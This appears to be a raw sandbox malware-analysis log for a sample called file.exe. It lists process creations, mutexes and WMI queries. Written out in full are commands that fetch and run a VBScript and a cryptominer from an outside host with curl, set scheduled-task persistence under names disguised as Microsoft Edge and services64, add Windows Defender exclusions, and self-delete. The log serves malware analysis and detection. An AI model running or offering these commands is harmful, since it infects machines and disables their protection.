                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7796:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1992:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Windows\System32\Microsoft\Libs\sihost64.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: file.exeReversingLabs: Detection: 50%
                        Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript conf.vbs
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\miner2.0.exe miner2.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\miner2.0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: unknownProcess created: C:\Windows\System32\services64.exe C:\Windows\system32\services64.exe
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\services64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\Microsoft\Libs\sihost64.exe "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                        Source: C:\Windows\System32\services64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost64.exe C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c
